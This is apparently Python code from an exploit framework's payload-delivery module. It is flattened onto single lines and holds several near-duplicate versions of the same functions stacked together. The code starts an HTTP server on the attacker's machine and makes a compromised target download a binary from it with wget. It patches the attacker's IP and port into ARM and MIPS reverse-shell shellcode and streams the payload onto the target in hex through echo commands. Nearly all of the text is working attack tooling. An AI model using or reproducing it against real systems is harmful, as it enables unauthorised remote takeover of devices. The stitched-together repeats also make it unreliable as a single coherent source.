def wget(self): print_status("Using wget method") self.binary_name = random_text(8) if "binary" in self.wget_options.keys(): binary = self.wget_options['binary'] else: binary = "wget" # run http server self.mutex = True thread = threading.Thread(target=self.http_server, args=(self.options['lhost'], self.options['lport'])) thread.start() while self.mutex: pass if self.port_used: print_error("Could not set up HTTP Server on {}:{}".format( self.options['lhost'], self.options['lport'])) return False # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -O {}/{}".format( binary, self.options['lhost'], self.options['lport'], self.binary_name, self.location, self.binary_name) self.exploit.execute(cmd) return True
def wget(self): print_status("Using wget method") self.binary_name = random_text(8) if "binary" in self.wget_options.keys(): binary = self.wget_options['binary'] else: binary = "wget" # run http server self.mutex = True thread = threading.Thread(target=self.http_server, args=(self.options['lhost'], self.options['lport'])) thread.start() while self.mutex: pass if self.port_used: print_error("Could not set up HTTP Server on {}:{}".format(self.options['lhost'], self.options['lport'])) return False # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, self.options['lhost'], self.options['lport'], self.binary_name, self.location, self.binary_name) self.exploit.execute(cmd) return True
def generate_binary(self, lhost, lport): print_status("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == "arm": self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10A] + port + self.arm[0x10C:] elif self.arch == "mipsel": self.revshell = ( self.mipsel[:0xE4] + port + self.mipsel[0xE6:0xF0] + ip[2:] + self.mipsel[0xF2:0xF4] + ip[:2] + self.mipsel[0xF6:] ) elif self.arch == "mips": self.revshell = ( self.mips[:0xEA] + port + self.mips[0xEC:0xF2] + ip[:2] + self.mips[0xF4:0xF6] + ip[2:] + self.mips[0xF8:] ) else: print_error("Platform not supported")
def generate_binary(self, lhost, lport): print_status("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == 'arm': self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:] elif self.arch == 'mipsel': self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:] else: print_error("Platform not supported")
def generate_binary(self, lhost, lport): print_status("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == 'arm': self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:] elif self.arch == 'mipsel': self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:] elif self.arch == 'mips': self.revshell = self.mips[:0xea] + port + self.mips[0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[2:] + self.mips[0xf8:] else: print_error("Platform not supported")
def echo(self): print_status("Using echo method") self.binary_name = random_text(8) path = "{}/{}".format(self.location, self.binary_name) # echo stream e.g. echo -ne {} >> {} if "stream" in self.echo_options.keys(): echo_stream = self.echo_options['stream'] else: echo_stream = 'echo -ne "{}" >> {}' # echo prefix e.g. "\\x" if "prefix" in self.echo_options.keys(): echo_prefix = self.echo_options['prefix'] else: echo_prefix = "\\x" # echo max length of the block if "max_length" in self.echo_options.keys(): echo_max_length = int(self.echo_options['max_length']) else: echo_max_length = 30 size = len(self.payload) num_parts = (size / echo_max_length) + 1 # transfer binary through echo command print_status("Sending payload to {}".format(path)) for i in range(0, num_parts): current = i * echo_max_length print_status("Transferring {}/{} bytes".format( current, len(self.payload))) block = self.payload[current:current + echo_max_length].encode('hex') block = echo_prefix + echo_prefix.join( a + b for a, b in zip(block[::2], block[1::2])) cmd = echo_stream.format(block, path) self.exploit.execute(cmd)
def echo(self): print_status("Using echo method") self.binary_name = random_text(8) path = "{}/{}".format(self.location, self.binary_name) # echo stream e.g. echo -ne {} >> {} if "stream" in self.echo_options.keys(): echo_stream = self.echo_options['stream'] else: echo_stream = 'echo -ne "{}" >> {}' # echo prefix e.g. "\\x" if "prefix" in self.echo_options.keys(): echo_prefix = self.echo_options['prefix'] else: echo_prefix = "\\x" # echo max length of the block if "max_length" in self.echo_options.keys(): echo_max_length = int(self.echo_options['max_length']) else: echo_max_length = 30 size = len(self.payload) num_parts = (size / echo_max_length) + 1 # transfer binary through echo command print_status("Sending payload to {}".format(path)) for i in range(0, num_parts): current = i * echo_max_length print_status("Transferring {}/{} bytes".format(current, len(self.payload))) block = self.payload[current:current + echo_max_length].encode('hex') block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2])) cmd = echo_stream.format(block, path) self.exploit.execute(cmd)
def __init__(self, exploit, payload, options): self.exploit = exploit self.payload = payload self.options = options self.binary_name = random_text(8)